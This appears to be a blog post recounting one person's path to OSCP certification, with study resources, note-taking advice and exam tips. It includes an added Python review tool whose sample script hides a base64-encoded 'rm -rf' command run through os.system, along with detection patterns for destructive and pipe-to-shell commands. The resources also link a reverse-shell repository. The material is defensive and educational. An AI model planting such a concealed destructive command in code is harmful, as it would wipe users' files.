If there is one thing to take away from my blog, it is “START BEFORE YOU START!”.
Before you start the journey to becoming OSCP certified there are some important points to understand and accept:
- The OSCP is not easy
- The OSCP requires a huge time investment
- The OSCP will require some form of monetary investment
- The OSCP requires serious willpower, determination, dedication, and a lot of head banging!
Great introductory article by Offensive Security:
https://www.offensive-security.com/offsec/what-it-means-to-be-oscp/
Great preparatory slide deck by Offensive Security:
https://www.offensive-security.com/wp-content/uploads/2022/03/oscp-prep-ebook.pdf
My OSCP Story
To preface, what drove me to start my career in cybersecurity was hacking. How? I used to be a hardcore Xbox 360 Halo 3 player. While playing competitively online in ranked matchmaking, there was a method of winning by cheating which was very prevalent. The losing team would start DDoSing the IPs of the winning team, causing players on the winning team to disconnect from the match. The objective was to give an unfair advantage to the losing team to make a comeback. Through this method of cheating I was introduced to hacking (mostly kiddy scripting) and began using tools like Cain & Abel and Net Tools, which inevitably sparked my interest in the computer sciences.
I went on to study cybersecurity in college and ended up graduating with a Master’s in the same discipline. I started in cybersecurity as a defender/sysadmin for about three years before the OSCP. It wasn’t until late 2020, when I got my first pentesting gig, that I really started to learn how to abuse systems as a career. After getting staffed, the client had stipulated in the contract that all testers had to be OSCP certified! I had to get it! Thus, my OSCP journey began!
Shortly after being staffed, my employer paid for my PWK course access in February of 2021. At that time, I had been in cyber for a few years with a basic understanding of system administration (Cisco/firewall/Windows admin), Splunk, and knowledge of managing security tools using the GUI interface.
No real Linux skills
No real Python skills
No real hacker “Methodology”
You’ll hear the term “Methodology” used a lot and very loosely; at times it can be hard to understand. The best way to understand it is as follows:
Technical Knowledge + Hacker Knowledge + Hacker Mindset = Your Methodology. In other words, your logical progression through solving (hacking) boxes.
(Check out my Book Review on The Pentester Blueprint: Starting a Career as an Ethical Hacker for more information).
However, I passed my exam on Aug 26, 2022, Alhamdulillah (thanks to God), nearly two years after starting my journey and after failing the exam twice. Here is how I did it, and here is how you can too!
My OSCP Experience Made Simple
For most, the OSCP is like trying to drink from a fire hose! After blood, sweat and tears here are my most important tips for anyone trying to pass this exam!
My OSCP Resources: (In the order I would recommend)
- Udemy Linux: https://www.udemy.com/course/linux-mastery/
- Udemy Python: https://www.udemy.com/course/the-python-bible/
- eJPT
- TJnull List of Proving Ground and HtB boxes
- Udemy Windows PrivEsc: https://www.udemy.com/course/windows-privilege-escalation/
- Udemy Linux PrivEsc: https://www.udemy.com/course/windows-privilege-escalation/
- Dante Pro Labs (not necessary; I completed it and it was a great resource)
- TryHackMe (Definitely the BoF Room)
- PWK Course (Watch ALL the videos)
- PWK Boxes (DO the AD SET!!)
- A lot, a lot, a lot of reading. (Articles, blogs, write-ups, reddit posts)
1. START BEFORE YOU START!
Start studying for the OSCP BEFORE you start the PWK course!! This is critical!! Do not go into the PWK course at 0. You will waste your time and money, and your lab access will expire before you can do anything meaningful. Before you start you should be comfortable using the Linux command line, reading and understanding code, and have your “Methodology” somewhat developed (i.e., your Technical Knowledge + Hacker Knowledge + Hacker Mindset). Here are the learning resources I would recommend to develop your skills!
Linux:
- Download VMware or VirtualBox and install Kali as a VM. (I may create a simplified blog for this soon, inshaAllah)
- Here’s an outstanding course on Linux command line mastery: https://www.udemy.com/course/linux-mastery/. This should help develop the basic skills needed to start.
- Start hacking boxes! I will go over the most effective method to hacking boxes later in the blog.
Note: You will need to learn how to use the Windows cmd as well. However, you will not need to master it. Most of what you need to learn will come naturally by way of hacking boxes.
Python:
- Here’s an outstanding course on Python — https://www.udemy.com/course/the-python-bible/. You do not need to become a Python developer; you just need to know what an exploit is doing before you run it, and how to tweak it if needed.
Note: Don’t run exploits before reading the code… especially if it’s not from Exploit-DB… Somebody might sneak in a command that deletes your OS!! or worse..
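The “read the code before you run it” advice above, as an added example that is not part of the original post: a small Python review aid that flags shell execution, dynamic exec, encoded payloads, destructive commands and pipe-to-shell patterns in a downloaded script, and also decodes base64 string literals so a command hidden inside one is surfaced. The rule set and the sample script are constructed for this example; the output is a list of places to read carefully, not a verdict.

```python
import base64
import re

# Constructed sample of a downloaded "exploit" script (not a real exploit).
# The destructive command sits in a base64 literal that is decoded and handed
# to the shell at import time, so a quick skim of the file would miss it.
HIDDEN = base64.b64encode(b"rm -rf ~/*").decode()
SAMPLE_SCRIPT = f'''import os, base64, socket
target = "10.10.10.5"
def exploit():
    payload = b"A" * 1024
    s = socket.create_connection((target, 9999))
    s.send(payload)
os.system(base64.b64decode("{HIDDEN}").decode())
'''

# Review hints as (name, pattern): an assumed rule set, not a published tool.
RULES = [
    ("shell-exec", re.compile(r"\b(os\.system|os\.popen|subprocess\.\w+)\s*\(")),
    ("dynamic-exec", re.compile(r"\b(exec|eval)\s*\(")),
    ("encoded-payload", re.compile(r"b64decode|bytes\.fromhex|zlib\.decompress")),
    ("destructive-cmd", re.compile(r"rm\s+-rf|mkfs\.|dd\s+if=")),
    ("pipe-to-shell", re.compile(r"(curl|wget)[^\n|]*\|\s*(ba)?sh\b")),
]
# Quoted string that looks like base64 (long enough to hide a command).
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{8,}={0,2})["']""")


def review_script(source):
    """Return (rule, location, snippet) findings for a script before you run it."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, rx in RULES:
            if rx.search(line):
                findings.append((name, f"line {lineno}", line.strip()))
    # Decode base64-looking literals and re-run the rules on the plaintext:
    # that is where a sneaked-in command usually lives.
    for m in B64_LITERAL.finditer(source):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        for name, rx in RULES:
            if rx.search(decoded):
                findings.append((name, "decoded base64 literal", decoded))
    return findings


if __name__ == "__main__":
    for rule, where, snippet in review_script(SAMPLE_SCRIPT):
        print(f"[{rule}] {where}: {snippet}")
```

Run it against the sample and the hidden `rm -rf` shows up as a destructive-cmd finding on the decoded literal, next to the shell-exec and encoded-payload hits on the line that runs it.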
Developing your Methodology:
Developing your methodology will come as you start hacking boxes. Inevitably, by getting hands-on-keyboard you will progressively develop your Methodology. Make sure you take great notes.
Note: Taking notes doesn’t mean highlight the entire book, just what is meaningful. I will explain more later in the blog.
- TryHackMe (best for beginners)
- Proving Grounds (best OSCP like boxes)
- HacktheBox (best community)
No doubt, the most efficient approach to getting hands-on practice for the OSCP exam is using TJnull’s list of OSCP-like boxes: https://docs.google.com/spreadsheets/u/1/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/htmlview
Note: I did 30 boxes from PWK, 40 boxes from Proving Grounds, and 40 boxes from HtB (including Dante Pro Labs). I took notes on every box; some I did twice to understand them. My numbers may differ from yours, everyone is different.
For privilege escalation I took both of Tib3rius’s courses on Udemy.
Both are a must! These courses undoubtedly helped me pass the exam!!
Make sure you follow along with him, replicating all the different methods.
- Linux Privilege Escalation: https://www.udemy.com/course/windows-privilege-escalation/
- Windows Privilege Escalation: https://www.udemy.com/course/windows-privilege-escalation/
2. LEARN HOW TO TAKE NOTES
All your notes should be in one location; I recommend using OneNote. Create a folder and make sections to divide your courses and resources.
For example, create a notebook called OSCP, then create sections like HTB, TryHackMe, PG, etc. Then for each machine start a new page.
It is crucial that before your exam you consolidate all your commands into one page for easy reference. Organization is key. The two times I failed, my commands were all over the place. I organized everything before my third attempt and passed!
Skim over OffSec’s requirements for the exam report; it will give you a good idea of what to note down: https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide
Note: Your exam report is your exam. Make sure you take screenshots!
- Screenshots, Screenshots, Screenshots!!! GreenShot is a MUST download: https://getgreenshot.org/
How to hack boxes
It took a while to figure out the most efficient approach to practicing. You will find a lot of different opinions on this topic, most of which are not balanced between theory and reality. There is NOTHING wrong with reading through write-ups; in fact, it is necessary! I would recommend reading through multiple write-ups to see the different approaches to the same vulnerabilities. That’s where the learning is!! However, you should exhaust your resources first before reading through them. (I would not recommend remaining stuck for more than a day.)
The general philosophy behind note taking as a hacker is so you can go back at any time and recreate the exploitation step by step. So when hacking boxes screenshot your major steps followed by a short explanation of what you did.
Note: At the end of every box I would write a small lessons-learned summary.
You should walk away from every box with two things:
1. An understanding of the technologies abused.
2. An understanding of the exploits used.
How to use IppSec
IppSec videos are important to watch as they help you understand how to think through boxes. However, DO NOT watch his videos and try to hack with him in real time. Meaning, hack the box you’re on first, then go back and watch the IppSec video on it. This was the approach I took.
3. PWK Course
It is necessary to go through all the PWK content. How I did it was by watching all the videos and taking notes, while using the PDF as a reference when needed. If I didn’t understand a topic I would go back to the book and read over that section. After finishing the course material, I started the labs.
Passing the Exam
Only after I did everything I advised above was I able to pass the exam on my third try. It’s important to trust in your ability and not to be nervous during your exam. On my third try I was much more relaxed than in my first two, and ironically, I passed.
Note: OffSec may give you a Buffer overflow box on the exam in addition to the AD environment. I would recommend completing the TryHackMe buffer overflow room.
When taking the exam think simple, trust in your abilities, and time yourself on each box.
I didn’t complete the coursework for the extra points. If you choose not to, then mathematically you’ll need to pwn the AD environment to pass.
To pass I pwned the AD environment and rooted two stand alone boxes.
Feel free to comment on this post if you have any questions. I will be more than happy to answer.
All the best!
سُبْحَانَكَ اللَّهُمَّ وَبِحَمْدِكَ أَشْهَدُ أَنْ لاَ إِلَهَ إِلَّا أَنْتَ أَسْتَغْفِرُكَ وَأَتُوبُ إِلَيْكَ
Glory is to You, O Allah, and praise is to You. I bear witness that there is none worthy of worship but You. I seek Your forgiveness and repent to You.
Resources:
Other good OSCP write-ups:
- https://hyd3.home.blog/2020/06/22/oscp-prep-hackthebox-list/
- https://princerohit8800.medium.com/my-oscp-journey-4e0804231b7f
- https://justinvanbibber2.medium.com/i-passed-the-oscp-on-the-1st-attempt-with-no-experience-b75d8603cfbf
GitHub Repo:
- https://github.com/C0nd4/OSCP-Priv-Esc
- https://github.com/gnome-terminator/terminator
- https://github.com/Dhayalanb/windows-php-reverse-shell/blob/master/Reverse%20Shell.php
Hacking Resources: